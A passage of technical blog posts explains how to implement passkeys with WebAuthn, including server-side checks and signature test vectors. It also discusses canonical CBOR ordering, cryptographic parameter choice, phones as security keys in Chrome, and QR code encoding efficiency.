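# Hypothetical, tiny stand-in for the public suffix list.
ETLDS = {"uk", "co.uk", "com"}

print(allowed_rp_ids("www.foo.co.uk", ETLDS))
# prints ['www.foo.co.uk', 'foo.co.uk']
```

The first entry in the result is the default RP ID that you get if you don’t set one.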

Our www.foo.co.uk example might happily be creating passkeys with the default RP ID but later decide that it wants to move all sign-in activity to an isolated origin, https://accounts.foo.co.uk. But none of the passkeys could be used from that origin! It would have needed to create them with an RP ID of foo.co.uk in the first place to allow that.

But you might want to be careful about always setting the most general RP ID because then usercontent.foo.co.uk could access and overwrite them too. That brings us to the second control mechanism. As you’ll see later, when a passkey is used to sign in, the browser includes the origin that made the request in the signed data. So accounts.foo.co.uk would be able to see that a request was triggered by usercontent.foo.co.uk and reject it, even if the passkey’s RP ID allowed usercontent.foo.co.uk to use it. But that mechanism can’t do anything about usercontent.foo.co.uk being able to overwrite them.

So either pick an RP ID and put it in the “SEE BELOW” placeholder, above. Or else don’t include the rp.id field at all and use the default.

Recording a passkey

When the promise from navigator.credentials.create resolves successfully, you have a newly created passkey! Now you have to ensure that it gets recorded by the server.

The promise will result in a PublicKeyCredential object, the response field of which is an AuthenticatorAttestationResponse. First, sanity check some data from the browser. Since this data isn’t signed over in the configuration that we’re using, it’s fine to do this check client-side.

const cdj = JSON.parse(
    new TextDecoder().decode(cred.response.clientDataJSON));
if (cdj.type != 'webauthn.create' ||
    (('crossOrigin' in cdj) && cdj.crossOrigin) ||
    cdj.origin != 'https://YOURSITEHERE') {
  // handle error
}

Call getAuthenticatorData() and getPublicKey() on response and send those ArrayBuffers to the server.

At the server, we want to insert a row into the passkeys table for this user. The authenticator data is a fairly simple, binary format. Offset 32 contains the flags byte. Sanity check that bit 6 is set (the flag that says attested credential data is included) and then extract:

  1. Bit 4 as the value of backed_up. (I.e. (authData[32] >> 4) & 1.)
  2. The big-endian, uint16 at offset 53 as the length of the credential ID.
  3. That many bytes from offset 55 as the value of id.

The ArrayBuffer that came from getPublicKey() is the value for public_key_spki. That should be all the values needed to insert the row.
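For the server side, a sketch of that parsing in Python might look like the following. The function name and the returned dict are made up for illustration. The flag it sanity-checks is the “attested credential data included” flag, which has mask 0x40 in the WebAuthn authenticator data layout.

```python
import struct

FLAG_BACKUP_STATE = 0x10   # bit 4 of the flags byte
FLAG_ATTESTED_DATA = 0x40  # bit 6: attested credential data is included


def parse_registration_auth_data(auth_data: bytes) -> dict:
    """Extract the credential ID and backup state from registration data."""
    # 32-byte RP ID hash, 1 flags byte, 4-byte counter, 16-byte AAGUID and
    # a 2-byte credential ID length must all be present.
    if len(auth_data) < 55:
        raise ValueError("authenticator data too short")
    flags = auth_data[32]
    if not flags & FLAG_ATTESTED_DATA:
        raise ValueError("no attested credential data")
    backed_up = bool(flags & FLAG_BACKUP_STATE)
    # Big-endian uint16 at offset 53 is the length of the credential ID.
    (id_len,) = struct.unpack_from(">H", auth_data, 53)
    credential_id = auth_data[55:55 + id_len]
    if len(credential_id) != id_len:
        raise ValueError("truncated credential ID")
    return {"id": credential_id, "backed_up": backed_up}
```

The two returned values, plus the bytes from getPublicKey() and the username from the session, are what go into the new row.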

Handling a registration exception

The promise from create() might also result in an exception. InvalidStateError is special and means that a passkey already exists for the local device. This is not an error, and no error will have been shown to the user. They’ll have seen a UI just like they were registering a passkey but the server doesn’t need to update anything.

NotAllowedError means that the user canceled the operation. Other exceptions mean that something more unexpected happened.

To test whether an exception is one of these values do something like:

function handleCreationError(e: Error) {
  if (e instanceof DOMException) {
    switch (e.name) {
      case 'InvalidStateError':
        console.log('InvalidStateError');
        return;

      case 'NotAllowedError':
        console.log('NotAllowedError');
        return;
    }
  }

  console.log(e);
}

(But obviously don’t just log them to the console in real code.)

Signing in with autocomplete

Somewhere on your site you have username & password inputs. On the username input element, add webauthn to the autocomplete attribute. So if you have:

<input type="text" name="username" autocomplete="username">

… then change that to …

<input type="text" name="username" autocomplete="username webauthn">

Autocomplete for passkeys works differently than for passwords. For the latter, when the user selects a username & password from the pop-up, the input fields are filled for them. Then they can click a button to submit the form and sign in. With passkeys, no fields are filled, but rather a pending promise is resolved. It’s then the site’s responsibility to navigate/update the page so that the user is signed in.

That pending promise must be set up by the site before the user focuses the username field and triggers autocomplete. (Just adding the webauthn tag doesn’t do anything if there’s not a pending promise for the browser to resolve.) To create it, run a function at page load that:

  1. Does feature detection and, if supported,
  2. Starts a “conditional” WebAuthn request to produce the promise that will be resolved if the user selects a credential.

Here’s how to do the feature detection:

if (!window.PublicKeyCredential ||
    !(PublicKeyCredential as any).isConditionalMediationAvailable) {
  return;
}

(PublicKeyCredential as any).isConditionalMediationAvailable()
  .then((result: boolean) => {
    if (!result) {
      return;
    }

    startConditionalRequest();
  });

Then, to start the conditional request:

var getOptions : CredentialRequestOptions = {
  // This is the critical option that tells the browser not to show
  // modal UI.
  mediation: "conditional" as CredentialMediationRequirement,

  publicKey: {
    challenge: Uint8Array.from(atob(CHALLENGE_SEE_BELOW), c =>
                                 c.charCodeAt(0)),

    rpId: SAME_AS_YOU_USED_FOR_REGISTRATION,
  }
};

navigator.credentials.get(getOptions).then(
  handleSignIn, handleSignInError);

Challenges

Challenges are random values, generated by the server, that are signed over when using a passkey. Because they are large random values, the server knows that the signature must have been generated after it generated the challenge. This stops “replay” attacks where a signature is captured and used multiple times.

Challenges are a little like a CSRF token: they should be large (16- or 32-byte), cryptographically-random values and stored in the session object. They should only be used once: when a sign-in attempt is received, the challenge should be invalidated. Future sign-in attempts will have to use a fresh challenge.

The snippet above has a value CHALLENGE_SEE_BELOW which is assumed to be the base64-encoded challenge for the sign-in. The sign-in page might XHR to get the challenge, or the challenge might be injected into the page’s template. Either way, it must be generated at the server!
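Here’s a rough sketch of the server half of that in Python. The `session` dict stands in for whatever session object your framework provides, and the key name and function names are made up for illustration.

```python
import base64
import secrets
from typing import Optional


def issue_challenge(session: dict) -> str:
    """Generate a fresh challenge, remember it, and return it base64-encoded."""
    challenge = secrets.token_bytes(32)
    # Hypothetical session key; overwrites any previous, unused challenge.
    session["webauthn_challenge"] = challenge
    return base64.b64encode(challenge).decode("ascii")


def consume_challenge(session: dict) -> Optional[bytes]:
    """Return the pending challenge and invalidate it in the same step."""
    return session.pop("webauthn_challenge", None)
```

Call consume_challenge as soon as a sign-in attempt arrives, before checking anything else, so that a failed attempt still burns the challenge.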

Handling sign-in

If the user selects a passkey then handleSignIn will be called with a PublicKeyCredential object, the response field of which is an AuthenticatorAssertionResponse. Send the ArrayBuffers rawId, response.clientDataJSON, response.authenticatorData, and response.signature to the server.

At the server, first look up the passkey: SELECT (username, public_key_spki, backed_up) FROM passkeys WHERE id = ? and give the value of rawId for matching. The id column is a primary key, so there can either be zero or one matching rows. If there are zero rows then the user is signing in with a passkey that the server doesn’t know about—perhaps they deleted it. This is an error: reject the sign-in.

Otherwise, the server now knows the claimed username and public key. To validate the signature you’ll need to construct the signed data and parse the public key. The public_key_spki values from the database are stored in SubjectPublicKeyInfo format and most languages will have some way to ingest them. Here are some examples:

Your language’s crypto library should provide a function that takes a signature and some signed data and tells you whether that signature is valid for a given public key. For the signature, pass in the value of the signature ArrayBuffer that the client sent. For the signed data, calculate the SHA-256 hash of clientDataJSON and append it to the contents of authenticatorData. If the signature isn’t valid, reject the sign-in.

But there are still a bunch of things that you need to check!

Parse the clientDataJSON as UTF-8 JSON and check that:

  1. The type member is “webauthn.get”.
  2. The challenge member is equal to the base64url encoding of the challenge that the server gave for this sign-in.
  3. The origin member is equal to your site’s sign-in origin (e.g. a string like “https://www.example.com”).
  4. The crossOrigin member, if present, is false.
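Those four checks could be sketched in Python like this. The function name and parameters are made up. `expected_challenge` is assumed to be the raw challenge bytes that the server stored for this sign-in.

```python
import base64
import hmac
import json


def check_client_data(client_data_json: bytes,
                      expected_challenge: bytes,
                      expected_origin: str) -> bool:
    """Return True only if all of the clientDataJSON checks pass."""
    try:
        cdj = json.loads(client_data_json.decode("utf-8"))
    except ValueError:  # covers both bad UTF-8 and bad JSON
        return False
    if not isinstance(cdj, dict):
        return False

    # The browser encodes the challenge as base64url without padding.
    expected_b64url = base64.urlsafe_b64encode(expected_challenge).rstrip(b"=")
    challenge = cdj.get("challenge")
    if not isinstance(challenge, str):
        return False

    return (
        cdj.get("type") == "webauthn.get"
        and hmac.compare_digest(challenge.encode("utf-8"), expected_b64url)
        and cdj.get("origin") == expected_origin
        and cdj.get("crossOrigin", False) is False
    )
```

Note the encoding difference: the snippets above hand the challenge to the page as standard base64, but the browser reports it back as unpadded base64url, which is why the comparison re-encodes the stored bytes.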

There’s more! Take the authenticatorData and check that:

  1. The first 32 bytes are equal to the SHA-256 hash of the RP ID that you’re using.
  2. Bit zero of the byte at offset 32 is one. I.e. (authData[32] & 1) == 1. This is the user presence bit that indicates that a user approved the signature.
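A sketch of those two checks in Python, with a helper for reading the backup bit that you’ll want afterwards. The function names are made up for illustration.

```python
import hashlib
import hmac


def check_assertion_auth_data(auth_data: bytes, rp_id: str) -> bool:
    """Check the RP ID hash and the user presence bit."""
    # 32-byte RP ID hash + 1 flags byte + 4-byte signature counter.
    if len(auth_data) < 37:
        return False
    expected_hash = hashlib.sha256(rp_id.encode("utf-8")).digest()
    if not hmac.compare_digest(auth_data[:32], expected_hash):
        return False
    # Bit zero of the flags byte is the user presence bit.
    return (auth_data[32] & 1) == 1


def backup_state(auth_data: bytes) -> bool:
    """Bit 4 of the flags byte: is this passkey currently backed up?"""
    return bool((auth_data[32] >> 4) & 1)
```

As a cross-check, the flags byte in the test vectors later in this post is 0x01: user presence is set and the backup bit is not.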

If all those checks work out then sign in the user whose passkey it was. I.e. set a cookie and respond to the running JavaScript so that it can update the page.

If the stored value of backed_up is not equal to (authData[32] >> 4) & 1 then update that in the database.

Removing passwords

Once a user is using passkeys to sign in, great! But if they were upgraded from a password then that password is hanging around on the account, doing nothing useful yet creating risk. It would be good to ask the user about removing the password.

Doing this is reasonable if the account has a backed-up passkey. I.e. if SELECT 1 FROM passkeys WHERE username = ? AND backed_up = TRUE has results. A site might consider prompting the user to remove the password on an account when they sign in with a passkey and have a backed-up one registered.

Registering new, passkey-only users

For sign ups of new users, consider making them passkey-only if the feature detection (from the section on enrolling users) is happy.

When enrolling users where a passkey will be their only sign-in method you really want the passkey to end up “in their pocket”, i.e. on their phone. Otherwise they could have a passkey on the computer that they signed up with but, if it’s not syncing to their phone, that’s not very convenient. There is not, currently, a great answer for this I’m afraid! Hopefully, in a few months, calling navigator.credentials.create() with authenticatorSelection.authenticatorAttachment set to cross-platform will do the right thing. But with iOS 16 it’ll exclude the platform authenticator.

So, for now, do that on all platforms except for iOS/iPadOS, where authenticatorAttachment should continue to be platform.

(I’ll try and update this section when the answer is simpler!)

Settings

If you’ve used security keys with any sites then you’ll have noticed that they tend to list registered security keys in their account settings, have users name each one, show the last-used time, and let them be individually removed. You can do that with passkeys too if you like, but it’s quite a lot of complexity. Instead, I think you can have just two buttons:

First, a button to add a passkey that uses the createOptions object from above, but with authenticatorAttachment deleted in order to allow other devices to be registered.

Second, a “reset passkeys” button (like a “reset password” button). It would prompt for a new passkey registration, delete all other passkeys, and invalidate all other active sessions for the user.

Test vectors

Connecting up to your language’s crypto libraries is one of the trickier parts of this. To help, here are some test vectors to give you a ground truth to check against, in the format of Python 3 code that checks an assertion signature.

import codecs

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import (
  load_der_public_key)

# This is the public key in SPKI format, as obtained from the
# `getPublicKey` call at registration time.
public_key_spki_hex = '''
3059301306072a8648ce3d020106082a8648ce3d03010703420004dfacc605c6
e1192f4ab89671edff7dff80c8d5e2d4d44fa284b8d1453fe34ccc5742e48286
d39ec681f46e3f38fe127ce27c30941252430bd373b0a12b3e94c8
'''

# This is the contents of the `clientDataJSON` field at assertion
# time. This is UTF-8 JSON that you also need to validate in several
# ways; see the main body of the text.
client_data_json_hex = '''
7b2274797065223a22776562617574686e2e676574222c226368616c6c656e67
65223a22594934476c4170525f6653654b4d455a444e36326d74624a73345878
47316e6f757642445a483664436141222c226f726967696e223a226874747073
3a2f2f73656375726974796b6579732e696e666f222c2263726f73734f726967
696e223a66616c73657d
'''

# This is the `authenticatorData` field at assertion time. You also
# need to validate this in several ways; see the main body of the
# text.
authenticator_data_hex = '''
26bd7278be463761f1faa1b10ab4c4f82670269c410c726a1fd6e05855e19b46
0100000cc7
'''

# This is the signature at assertion time.
signature_hex = '''
3046022100af548d9095e22e104197f2810ee9563135316609bc810877d1685b
cff62dcd5b022100b31a97961a94b4983088386fd2b7edb09117f4546cf8a5c1
732420b2370384fd
'''

def from_hex(h):
    return codecs.decode(h.replace('\n', ''), 'hex')

def sha256(m):
    digest = hashes.Hash(hashes.SHA256())
    digest.update(m)
    return digest.finalize()

# The signed message is calculated from the authenticator data and
# clientDataJSON, but the latter is hashed first.
signed_message = (from_hex(authenticator_data_hex) +
                  sha256(from_hex(client_data_json_hex)))

public_key = load_der_public_key(from_hex(public_key_spki_hex))
public_key.verify(from_hex(signature_hex),
                  signed_message,
                  ec.ECDSA(hashes.SHA256()))
# `verify` throws an exception if the signature isn't valid.
print('ok')

Where to ask questions

StackOverflow is a reasonable place, with the passkey tag.

Passkeys

The presentations are out now (Google I/O, WWDC): we're making a push to take WebAuthn to the masses.

WebAuthn has been working reasonably well for enterprises and technically adept users. But we were not going to see broad adoption while the model was that you had to purchase a pair of security keys, be sure to register the backup on every site, yet also keep it in a fire safe. So the model for consumers replaces security keys with phones, and swaps out having a backup authenticator with backing up the private keys themselves. This could have been a different API, but it would have been a lot to have a second web API for public-key authentication, so WebAuthn it is. Basing things on WebAuthn also means that you can still use your security key if you like*, and hopefully with an expanded range of sites.

(* albeit not with Android this year, because it doesn't support a recent enough version of CTAP yet. Sorry.)

The WebAuthn spec is not a gentle introduction, but you can find several guides on how to make the API calls. Probably there'll be more coming. What I wanted to cover in this post is the groundwork semantics around passkeys. These are not new if you're fully versed in WebAuthn, but they are new if you've only used WebAuthn in a 2nd-factor context.

I'll probably build on this in some future posts and maybe amalgamate some past writings into a single document. The next paragraph just drops you into things without a lot of context. Perhaps it'll be useful for someone, but best to understand it as fragments of a better document that I'm accumulating.

Ok:

An authenticator is a map from (RP ID, user ID) pairs, to public key credentials. I'll expand on each of those terms:

An authenticator, traditionally, is the physical thing that holds keys and signs stuff. Security keys are authenticators. Laptops can be too; Windows Hello has been an authenticator for a while now. In the world of passkeys, phones are important authenticators. Now that keys may sync, you might consider the sync account itself to be a distributed authenticator. So, rather than thinking of authenticators as physical things, think of it as whatever maintains this map that contains the user's credentials.

An RP ID identifies a website. It's a string that contains a domain name. (In non-web cases, like SSH, it can be a URL, but I'm not covering them here.) A website can use an RP ID if that RP ID is equal to, or a suffix of, the site's domain, and the RP ID is at least an eTLD + 1. So https://foo.bar.example.com can use RP IDs foo.bar.example.com, bar.example.com, and example.com, but not com (because that's less than an eTLD + 1), nor example.org (because that's an unrelated domain). Because the credential map is keyed by RP ID, one website can't use another's credentials. However, be conscious of subdomains: usercontent.example.com can use an RP ID of example.com, although the client data will let the server know which origin made any given request.

Next, a user ID is an opaque byte string that identifies an account on a website. The spec says that it mustn't contain identifiable information (i.e. don't just make it the user's email address) because security keys don't protect the user ID to the same degree that they protect other information. The recommendation is to add a column to your users table, generate a large random value on demand, and store it there for each user. (The spec says 64 bytes but if you just generated 16 from a secure random source, I think you would be fine.) You could also HMAC an internal user ID, although that concentrates risk in that HMAC key.
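Both options are only a few lines of Python. This is a sketch under assumptions: the function names are made up, and the HMAC variant assumes that internal user IDs are integers.

```python
import hashlib
import hmac
import secrets


def random_user_id(num_bytes: int = 16) -> bytes:
    """A fresh random user ID, to be stored in the users table."""
    return secrets.token_bytes(num_bytes)


def derived_user_id(hmac_key: bytes, internal_user_id: int) -> bytes:
    """Derive a user ID from an internal ID; nothing extra to store."""
    message = str(internal_user_id).encode("ascii")
    return hmac.new(hmac_key, message, hashlib.sha256).digest()
```

The derived form saves a column, but anyone who learns hmac_key can link user IDs back to internal IDs, which is the concentration of risk mentioned above.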

Recall that an authenticator maps (RP ID, user ID) pairs to credentials? The important consequence is that if a site creates a credential it'll overwrite any existing credential with the same user ID. So an authenticator only contains a single credential for a given account. (For those who know WebAuthn already: I'm assuming discoverable credentials throughout.)

A credential is a collection of various fields. Most obviously a private key, but also metadata: the RP ID, for one, and user information. There's three pieces of user information: the user name, display name, and ID. We've covered the user ID already. The other two are free-form strings that get displayed in UI to help a user select a credential. The user name is generally how a user identifies themselves to the site, e.g. an email address. The display name is how the user would want to be addressed, which could be their legal name. Of the two, the user name will likely be more prominent in UIs.

Lastly a passkey is a WebAuthn credential that is safe and available when the user needs it, i.e. backed up. Not all implementations will be backing up credentials right away and passkeys on those platforms can be called “single-device passkeys”, which is a little awkward, but so's the lack of backup.

Another important aspect of the structure of things is that, while an account only has a single password, it can have multiple passkeys. That's because passkeys can't be copy–pasted around like passwords can. Instead users will register passkeys as needed to cover their set of devices.

The authenticatorAttachment field in the assertion structure hints to the website about when an additional passkey might be needed. If the value of that field is cross-platform then the user had to use another device to sign in and it might be worth asking them if they want to register the local device.

When there are multiple passkeys registered on a site, users will need to manage them. The way that sites have often ended up managing 2nd-factor WebAuthn credentials is via an explicit list in the user's account settings. Usually the user will be prompted to name a credential at registration time to distinguish them. That's still a reasonable way to manage passkeys if you like. (We pondered whether browsers could send a passkey “name” at registration time to avoid prompting the user for one but, in a world of syncing, there doesn't seem to be a good value that isn't either superfluously generic, e.g. “Google devices”, or a privacy problem, e.g. the sync account identifier).

If prompting for names and having an explicit list seems too complex then I think it would also be fine to simply have a reset button that a) registers a new passkey, b) deletes every other passkey on the account, and c) signs out all other sessions. I.e. a button that mirrors a password reset flow. For a great many sites, that would work well.

We don't want passwords to hang around on an account forever as a neglected weak-link. In order to guide sites in determining when that might be worth prompting the user to remove their password, there's a new backup state bit in the authenticator data that the server gets with each authentication. If it's set then the passkey will survive the loss of the device. (Unless the device is destroyed after creating the passkey but before managing to sync. But that's the same as generating a random password in a password manager.)

There are not firm rules around using that bit, but once the user has a backed up passkey on a portable authenticator then it's probably time to ask about dropping the password. Sites can know this when they see a creation or assertion operation with the backup state bit set and either the attachment is cross-platform, or it's platform but that platform is a mobile device. That's a conservative set of rules because, for example, a credential created on a MacBook might get synced to the user's iPhone. But maybe that user doesn't have an iPhone.
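Written out as code, that conservative rule is tiny. In this Python sketch the function and parameter names are made up, and how a site decides that the platform is a mobile device (platform_is_mobile) is left as an assumption.

```python
from typing import Optional


def should_offer_password_removal(backup_state: bool,
                                  attachment: Optional[str],
                                  platform_is_mobile: bool) -> bool:
    """Apply the conservative rule to one creation or assertion operation."""
    if not backup_state:
        # The passkey would not survive the loss of the device.
        return False
    if attachment == "cross-platform":
        return True
    # A platform passkey only counts if that platform is itself portable.
    return attachment == "platform" and platform_is_mobile
```

With these rules, a backed up credential created on a laptop returns False, which is the conservative MacBook case above.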

As you can see, one of the challenges with passkeys is the complexity! Several teams at Google are still working on fleshing out the things demoed at I/O but we know that good guidance will be important. In the meantime, I'm happy to answer questions over Twitter and am pondering if public office hours would be helpful too.

The several canons of CBOR

There are many encoding formats. CBOR is one of them. Like several others, a subset of it is basically fine—I'm not starting that fight today.

Whatever encoding you use, it's nice to reduce flexibility. If there are multiple ways of encoding the same thing then, for anything with a non-negligible diversity of implementations, you'll find that there is a canonical encoding, it's just not documented. As soon as one implementation tries using a valid, but less common encoding, it'll find that it doesn't work and something will change to sort it all out. But that process of eventual coordination is expensive—better to do it explicitly and up-front.

For example, TCP options are chunks of tag–length–value and the spec doesn't define any restriction on their ordering. That didn't stop me blowing up an Ubuntu release because a change of mine happened to alter the order that Linux sent them, and some DSL modems dropped packets when options came in that order. That's an expensive discovery of an implicit canonicalisation rule.

If you're using CBOR then RFC 7049 has a section titled “Canonical CBOR”. One of the things it defines is how to order map elements. Great! No more TCP options messes. You can read that section for yourself, but one interpretation of the words there is what I'll call the three-step ordering for map keys:

  1. Lowest valued types come first then, within each type,
  2. Shortest encoded key comes first then, within consecutive keys with equal lengths,
  3. Sort lexicographically.

However, there is another interpretation of the same section which I'll call the two-step ordering. It drops the first step, i.e. doesn't sort by types. When I first read that section, I certainly came away with only one interpretation, but I can somewhat see how the other arises.

CTAP, the protocol for talking to security keys, uses CBOR a lot and explicitly picks the three-step ordering. An erratum was eventually raised against the RFC to “clarify” that the three-step order was correct, but it was rejected as a semantic change. So perhaps that's an official ruling that two-step was the correct understanding?

It only matters if you mix different types of keys in the same map, and sometimes you don't, so maybe it's moot for you. (But keep in mind that negative and non-negative numbers are different types in CBOR.) Anyway, the IETF revised the CBOR RFC to firmly clarify the issue, or rather to add a third option:

RFC 7049 is obsoleted by 8949. The old “Canonical CBOR” section is replaced by “Core Deterministic Encoding Requirements” and that specifies what I'll have to call the one-step ordering:

  1. Sort lexicographically on the encoded key.

It has some advantages! Like, why was it ever more complicated than that in the first place? But it was, and now there's two (or three) orderings. The two-step ordering even has a subsection of its own in the new RFC and a note saying that it “could be called Old Canonical CBOR”. If only shipped implementations were as changeable as the X-Men universe.

So that's why there's two and a half “canonical” CBORs and now I have something that I can reference when people ask me about this.

Update: Someone on Twitter (Thomas Duboucher, perhaps? Sorry, I lost the tweet!) pointed out that the 1- and 3-step ordering give the same results in many cases. Having thought about it, that's correct! As long as you don't use maps, arrays, or tagged values as map keys, I believe they coincide. For something like CTAP2, where map keys are always ints or strings, they work out the same. So perhaps things aren't so bad. (Or perhaps a really subtle difference is worse! Time will tell.)
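To see the orderings side by side, here's a small Python sketch. It only handles int and string keys, the encoder is a minimal one written for this illustration rather than a real CBOR library, and the function names are my own labels for the three orderings described above.

```python
def encode_head(major: int, value: int) -> bytes:
    """Encode a CBOR head using the shortest form for `value`."""
    if value < 24:
        return bytes([(major << 5) | value])
    for extra, size in ((24, 1), (25, 2), (26, 4), (27, 8)):
        if value < 1 << (8 * size):
            return bytes([(major << 5) | extra]) + value.to_bytes(size, "big")
    raise ValueError("value too large")


def encode_key(key) -> bytes:
    """Encode an int or str map key; other key types are out of scope."""
    if isinstance(key, bool):
        raise TypeError("bool keys are not handled in this sketch")
    if isinstance(key, int):
        # Non-negative ints are major type 0; negative ints are type 1.
        return encode_head(0, key) if key >= 0 else encode_head(1, -1 - key)
    if isinstance(key, str):
        data = key.encode("utf-8")
        return encode_head(3, len(data)) + data
    raise TypeError("only int and str keys are handled in this sketch")


def one_step(keys):
    # Sort lexicographically on the encoded key.
    return sorted(keys, key=encode_key)


def two_step(keys):
    # Shortest encoding first, then lexicographic.
    return sorted(keys, key=lambda k: (len(encode_key(k)), encode_key(k)))


def three_step(keys):
    # Major type first, then length, then lexicographic.
    def sort_key(k):
        enc = encode_key(k)
        return (enc[0] >> 5, len(enc), enc)
    return sorted(keys, key=sort_key)


keys = [1000, "aa", -1, 10, "a", 100]
print(one_step(keys))    # prints [10, 100, 1000, -1, 'a', 'aa']
print(two_step(keys))    # prints [10, -1, 100, 'a', 1000, 'aa']
print(three_step(keys))  # prints [10, 100, 1000, -1, 'a', 'aa']
```

For these keys the one- and three-step orderings agree, as the update says they should, while the two-step ordering interleaves the types.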

Picking parameters

When taking something from cryptographic theory into practice, it's very important to pick parameters. I don't mean picking the right parameters — although that certainly helps. I mean picking parameters at all.

That might seem obvious, but there are pressures pushing towards abdication: what if you get it wrong? Why not hedge bets and add another option? What about the two groups who already shipped something? We could just add options so that everyone's happy.

There are always exceptions, but the costs of being flexible are considerable. ANSI X9.62, from 1998, specified how elliptic curves were encoded in ASN.1 and included not just 27 possible curves, but allowed the parameters to be inherited from the issuing CA and allowed completely arbitrary elliptic curves to be defined inside a public key. That specifies almost nothing and avoids really standardising on anything. Thankfully I've not seen parameter inheritance implemented for ECC (it would be a security mess) but support for custom elliptic curves does, sadly, exist.

A couple of years ago, Microsoft had a signature bypass because of support for arbitrary curves [details]. Today, OpenSSL had an infinite loop in certificate parsing because of the same. On the flip side, I'm not aware that anyone has ever used the ability to specify arbitrary curves for anything useful.

It's not fair to just blame X9.62: don't get me started about RSA PSS. The cost of having too many options is frequently underestimated. Why does AES-192 exist, for example, other than to inflate test matrices?

As an aside, it's interesting to wonder how many CPU decades have been spent fuzzing OpenSSL's certificate parsing and yet today's issue wasn't reported before. This isn't a 2^-128 fraction of state space that fuzzers couldn't be expected to find, and I'm not sure that Tavis found it from fuzzing at all.

Phones as security keys in Chrome

With Chrome 94, if you have an Android phone with Chrome on it, and it’s syncing to the same Google account as Chrome on a Chrome OS/Windows/macOS device, then you’ll be able to use that phone as a security key. You should be able to try this out on any WebAuthn-using website, for example here. (But not accounts.google.com, which uses a different system.)

The reason that you are reading about this here and not on an official Google site is that people shouldn’t start registering their phone as a security key unless they have a physical security key as a backup. Just like a regular security key, if you lose the phone then you lose the credentials. So, just like a regular security key, you should have a backup. (You can also lose your credentials if you remove the screen lock, or somehow wipe out Play Services state — e.g. by doing a factory reset.)

We have plans for addressing this and making this suitable for regular people, and to allow use in other profiles, but we’re not there yet. We are interested in whether the communications infrastructure is good enough though. (More below.)

For signing into Google, it has long been possible to use your phone as a security key. This only worked in Chrome and functioned over BLE GATT between the desktop and phone. We have wanted to expand this to the web in general for years, but the success rate that we measured with BLE was poor. After quite a lot of work trying to improve the BLE success rate, we didn’t achieve much.

But the use of BLE is more than just a convenience. The security model demands some proof of physical proximity between the authenticator and the machine that is being authenticated. For a USB security key the authenticator will only respond to something that is making physical contact with it. So when a phone is acting as a security key it needs to prove that the machine it is talking to is physically close by. (Or at least that the attacker is in control of a BLE radio that is physically close.)

We looked at other Bluetooth modes in the hopes that they might work better, but classic Bluetooth RFCOMM isn’t supported on iOS and requires a lot of user interaction on Android. BLE L2CAP is supported on iOS, but isn’t supported (in user space) on Windows. It’s also flaky in the face of MAC address rotation if the devices aren’t paired.

So where we’ve ended up is that all the communication happens over the internet connection, but the phone sends a nonce in a BLE advert and the other end of the channel has to prove receipt. That’s the least amount of Bluetooth we could use while still requiring physical proximity. Needing bilateral internet connectivity is unfortunate though. So you can also connect the phone with a USB cable while the security key operation is running. (But very sadly not on Windows; the USB stack there just isn’t designed in the right way for it.) We might also add L2CAP as an option in the future.

This isn’t enabled on Linux at the moment. Historically trying to do the BLE GATT connection would often fail with bluez, and so the phone as a security key infrastructure was disabled on Linux. Now that the desktop only needs to receive a BLE advert it looks like it could work, but we haven’t flipped that switch yet.

As I mentioned above, we are interested in whether the underlying infrastructure is plausible. Aggregated anonymous statistics are useful for many things but in this case they suggest that BLE isn’t always working as well as it should, but don’t tell us why not. So if you are especially keen about security keys and want to try this out, I’d be interested in your experiences. I can't promise to respond but I will read everything if you send me an email (agl at chromium dot org) or tweet at me (agl__).

Here are some troubleshooting hints if you're having issues, because this will be much faster than asking me!

If no phones appear as options: you're using Windows, macOS, or Chrome OS, yes? And it's an Android phone? And the machine has working Bluetooth? And Chrome is up to date everywhere? If you navigate to chrome://sync-internals, is the “Transport state” at the top-left reporting “Active”? If not, enable Sync. On the phone, does Settings say that Sync is on at the top? If not, enable it. Is the account listed in Settings on the phone the same as the “Username” in chrome://sync-internals on the desktop? If all that's good then probably you just need to wait because it can take a couple of days for the registration to propagate. Probably in the “Device Info” section of the “Sync Node Browser” in chrome://sync-internals your phone is listed, but there's no paask_fields section yet. If you want to short-circuit that, you can install Chrome Canary on the phone and enable syncing there. That should register quite quickly.

You can select the phone on the desktop, but nothing happens: the phone should be getting a cloud message poke that triggers a notification. Does the phone have internet access? Did you completely disable notifications from Chrome? `adb logcat | grep -i cable` would be interesting if you're set up for that. Otherwise, if this is a common issue, I might have to add some logging and ask for the tunnel URL from chrome://device-log.

You get the notification and tap it, but something else goes wrong: if an error code or error message is displayed then I want to know what it is! If it's hanging then the message at the bottom of the screen changes for each step of the process so that's what'll be useful. Most problems seem to be BLE: is the phone close to the desktop? What other BLE is happening on the devices?

Efficient QR codes

QR codes seem to have won the battle for 2D barcodes, but they're not just a bag of bits inside. Their payload is a series of segments, each of which can have a different encoding. Segments are bitstrings, concatenated without any byte-alignment, and terminated with an empty segment of type zero. If you want to squeeze the maximum amount of data into a QR code without it turning into a gray square, understanding segmentation helps.

The most basic segment type is byte mode, which is a series of 8-bit bytes. If you control the QR decoder then this is perfectly efficient for encoding binary data. But you probably need to work with a variety of decoders. In that case, beware: the first edition of the QR standard, ISO/IEC 18004, said that byte mode should be interpreted as JIS X 0201. The 2005 edition changed that to be ISO/IEC 8859-1 (i.e. Latin-1). In practice, some QR decoders will attempt to content-sniff the encoding because, while UTF-8 contents should be indicated with an ECI header, they often aren't and UTF-8 is really common.

So if you put binary data into a QR code, you are probably going to hit these edge cases. The contents are likely going to be passed to a general operating system API for handling URLs — do you think the full pipeline will handle NUL bytes in the string, and UTF-8 non-characters and invalid surrogate pairs when interpreted as UTF-8? Also, you probably want your QR contents to be a printable string: bits of it might be shown in the scanner's UI; users might need to copy and paste them.

So let's assume that you want something printable and consider an obvious answer: base64url. It's very common, printable, and doesn't contain any characters that are special in URLs for maximum compatibility. It'll be encoded in a byte-mode segment: each base64url character contains 6 bits of information and takes 8 bits in the QR code for an efficiency of 75%. That's our baseline.

The next segment type to consider is digit mode. This only encodes the digits, 0–9, by packing triples of digits into 10 bits. If there are two digits left over at the end then they take 7 bits, and a singleton takes 4 bits. Ignoring the potential digits at the end, this lets you store 3×log2(10) = 3×3.322 = 9.966 bits of information in 10 bits of space. That's 99.66% efficient! So you can clearly do better than base64url.
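A minimal sketch of that packing, covering only the data bits of a digit-mode segment (not the mode indicator or character count that precede them). The function name is mine, and the bits are returned as a string of '0' and '1' purely for readability.

```python
def pack_digits(digits: str) -> str:
    """Return the data bits of a QR digit-mode segment as a '0'/'1' string."""
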